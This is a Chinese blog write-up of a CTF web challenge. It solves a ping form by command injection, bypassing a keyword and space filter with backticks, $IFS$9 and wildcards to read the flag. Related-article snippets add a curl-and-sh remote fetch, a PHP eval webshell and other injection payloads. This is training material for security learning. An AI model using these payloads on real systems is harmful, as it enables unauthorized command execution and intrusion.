BMZCTF WEB shell_exec

最新推荐文章于 2022-04-08 17:51:20 发布
最新推荐文章于 2022-04-08 17:51:20 发布
阅读量394 收藏
点赞数
分类专栏: BMZCTF-WEB 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Crazy198410/article/details/113103146
版权

在这里插入图片描述
打开页面发现是个ping的页面:
在这里插入图片描述
尝试了几个命令执行的方法,均无返回结果:
查看源代码:
在这里插入图片描述
发现了下面的命令:

ping -c 2 "$_POST[ip]" 2>&1

后面的2>&1的意思是:标准错误重定向到标准输出。
也就是说我们在网页的输入,当遇错时,结果会被输出到一个地方,而我们没有指定,所以看不到。
知道原理了,那么我们开始构造payload:
1、要程序运行错误;
2、要指定输出位置。
由于页面带过滤,经过多次尝试:发现

#以下被过滤
cat
tac
less
more
base
bash
sh
perl
flag
\t
&
"
\*
-
;
php
空格

发现 ′ 未被过滤
我们先用ls查看目录下文件:
我们在框内输入:

`ls>1.txt`

再访问1.txt:
在这里插入图片描述
发现返回了结果,没有flag文件,再看下根目录,因为空格被过滤,我们使用$IFS$9代替:

`ls$IFS$9/>1.txt`

在这里插入图片描述
分别查看,访问flag,并得到了flag:

`head$IFS$9/fl?g>1.txt`

BMZCTF{c9ab55cc7d934a23b5bc2c3184903843}

Crazy198410
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ping的wp
一个码农的笔记
11-24 702
这道题目是https://hackme.inndy.tw/scoreboard/的一个web题目,题目地址在:https://hackme.inndy.tw/ping,首先这个题目给了源码 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>Ping</title> </head> <body>
Ping ip的几种情况
平行宇宙i的博客
06-06 5970
ping命令详解 ping命令入门详解
热门推荐
于继江的博客
03-09 36万+
在这个时代,科技越来越发达,网络已经越来越成为人们不可缺少的一部分。计算机也已经是很多学校的课程了,因为计算机技术是非常有技术性的专业,它其中涉及到很多专业知识,需要通过学习才能掌握。今日小编就为大家介绍一个计算机的命令,它叫做Ping,这边介绍一下它的入 门 知识,主要是关于ping连接和命令方面的介绍。  1、Ping的基础知识  ping命令相信大家已经再熟悉不过了,但是能把ping的功能发...
Linux shell中2>&1的含义解释 (全网最全,看完就懂)
业精于勤,荒于嬉;行成于思,毁于随
09-11 17万+
A.首先了解下1和2在Linux中代表什么 名称 代码 操作符 Java中表示 Linux 下文件描述符(Debian 为例) 标准输入(stdin) 0 &amp;amp;lt; 或 &amp;amp;lt;&amp;amp;lt; System.in /dev/stdin -&amp;amp;gt; /proc/self/fd/0 -&amp;amp;gt; /dev/pts/0 标准输出(stdout
ping批量ip并显示结果
大圣欲何的博客
01-06 1万+
(做个记录避免忘记) 类型一: ping一个文件里面的ip。如果可以ping通显示up,如果不能ping通显示down #! /bin/bash for ip in `cat iplist` do ping=`ping -c 1 $ip|grep loss|awk '{print $8}'|awk -F "%" '{print $1}'` if [ $ping -eq 100 ];then
PHP 命令行工具 shell_exec, exec, passthru, system详细使用介绍
01-20
shell_exec() shell_exec() 命令行实际上仅是反撇号 (`) 操作符的变体。如果您编写过 shell 或 Perl 脚本,您就知道可以在反撇号操作符内部捕捉其他命令的输出。例如,清单 1 显示了如何使用反撇号...
PHP中exec函数和shell_exec函数的区别
12-19
这两个函数都是执行Linux命令函数,不同的是获取返回结果不一样,exec只能获取最后一行数据,shell_execu则可以获取全部数据。 假如脚本路径下有如下文件: 复制代码 代码如下: -bash-4.1# ll 总用量 12 -rw-rw-r–. ...
解决Windows下PHP的execshell_exec等函数不能正常运行的方法
02-11
在Windows平台下安装PHP后,在使用PHP的execshell_exec等函数时,经常会遇到报错:unable to fork...,这实际上是因为PHP对cmd.exe没有足够的权限引起的。
[原题复现]百度杯CTF比赛 十月场 WEB EXEC(PHP弱类型)
笑花大王
03-12 666
简介 原题复现: 考察知识点:PHP弱类型、 线上平台:https://www.ichunqiu.com/battalion(i春秋 CTF平台) 过程 看源码发现这个 vim泄露 下方都试了一遍 。index.php.swp是的 下载源码即可 .index.php.swpindex.php.swp ——vim文件泄露index.php.bakindex.php~ 要通过...
ctf web shell
god_001的博客
04-08 3177
题目: 打开网址,发现一片空白,回来查看提示描述,经过分析发现,描述可等同于: 这是一个可变函数的应用,实际运行就等同于执行assert($_GET['s']); assert()函数在php语言中是用来判断一个表达式是否成立的,返回true or false; 重要的是函数括号内的语句会被执行。 因此,只要通过s传指令,就可以得到想要的结果,首先查看当前目录: http://114.67.175.224:18164/?s=system('ls') 发现当前目录有两个文件,再打.
CTF-shell_exec-Wp
qq_28545703的博客
10-29 1403
CTF-shell_exec-Wp 题目是这样的,ping命令测试 查看html源代码看到一个tip 解题过程一 经过大量测试目的其实就是执行cat /flag 但是发现有过滤了空格,这里我们$IFS$9代替 我是利用echo curl http://xxxxx.com/1.php >a ,然后执行sh a这样拿shell的,需要绕过php 最终poc: #第一条,把vps的<?php system('cat /flag')>写进去a `echo$IFS$9curl$IFS$9112h
关于BMZCTFshell_exec的解法详解
永远是少年
01-15 1146
BMZCTF中,有一道题是shell_exec,在尝试做了该题后,又翻看了现有的write-up,发现现有的write-up语焉不详,对于不原理和微操讲解不细,因此写了这篇文章,主要是在前人的基础上对此题进行进一步描述,主要针对刚接触此领域的小白用户,希望能够对他们理解这道题提供帮助。 首先,打开本题,可以看到如下界面: 进行测试,发现输入一个IP地址或者域名后,可以PING测试对应的IP,然后把结果反馈到界面上来。 之后,查看页面源代码(不要问我为什么要查看页面源代码,做CTF题查看页面源代码应该是本
BMZCTF shell_exec
qq_26243045的博客
11-28 478
考点:命令执行 打开题目能猜出来是考命令执行。 做了半天发现底部有个语法提示。 过滤了很多命令,但是head还可以执行。用在取反符号中写入命令,完整payload `head$IFS$9/fla?$IFS$9>1.txt` 拿到flag ...
解决PHP中Web程序中shell_exec()执行Shell脚本不成功问题
沛哥儿的专栏
11-22 4万+
问题 今天发现在使用定时器的时候,执行一个shell脚本,打印日志正常,然后在系统中不能查到当前Shell脚本执行的结果。 因为使用的是Web程序,对于Shell调用这块也是新手。以前没有遇到过这种问题,只能靠猜了。 判断 1、Shell脚本问题。 验证方式:进入系统控制台,然后直接调用脚本,验证脚本正常。排除脚本本身问题。 2、判断应该问题来自于权限 验证方式:进入控制台,查看执行
BUUCTF WEB exec+lovesql
qq_41696858的博客
08-18 200
攻防世界靶场不知道咋了,又进不去了 那就刷几题BUUCTFexec 这题题目名字给的挺明显的,命令执行 经检测,|,||没有被过滤,且有回显,那就一级级往上找就行了 127.0.0.1|ls ../../../ 127.0.0.1|cat ../../../flag LoveSql SQL注入,注入点和之前一样的,一个单引号直接回显 那么后面就是payload了 admin 123' order by 4 # 开始报不同的错,可知列数为3 admin 123' union select 1,2,3
CTFping命令绕过及符号用法
Hardworking666的博客
10-13 9730
文章目录一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd import matplotlib.pyplot as plt import seaborn as sns import warnings warnings.filterwarnings('ig..
BMZCTF Web up
qq_26243045的博客
01-14 312
打开页面。 发现没有什么有用的信息,查看源代码也一样。 于是进行目录扫描: 发现了两个页面。分别打开。 index.html 无用。 upload.html: 是一个文件上传点。 先尝试上传正常图片: 可以看到,文件的临时目录和文件上传后的存储位置。 查看上传后的文件: 可以看到,是以代码的形式显示出来,而不是图片。 也就是说我们可以上传图片马来执行命令。 上传一个php文件: 多次尝试,发现是白名单过滤。而且文件内容还会被重写。我们就想到了二次渲染。
百度杯CTF Write up集锦 WEB
4ct10n
09-21 4万+
九月场1.code一开始的URL为http://ace3c302efed4a9094cbac1dff0250e8add1b4b45f8249d4.game.ichunqiu.com/index.php?jpg=hei.jpg尝试着令jpg=index.php得出了base64编码的文本 丢到解码器里解出文本index.php<?php /** * Created by PhpStorm. *
一句话***(webshell)是如何执行命令
weixin_34381687的博客
06-16 1880
      在很多的***过程中,***人员会上传一句话***(简称webshell)到目前web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此,那么一句话***到底是如何执行的呢,下面我们就对webshell进行一个简单的分析。首先我们先看一个原始而又简单的php一句话***。&lt;?php @eval($_POST['cmd']); ?&gt;看到这里不得不赞美前...
php fpm模式 不能运行shell_exec
最新发布
06-06
和 `exec()` 函数一样,`shell_exec()` 函数也可以执行系统命令,并返回其输出结果。因此,在使用 `shell_exec()` 函数时需要特别小心,以避免安全漏洞。 默认情况下,PHP FPM 会禁用一些危险的函数,包括 `shell_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值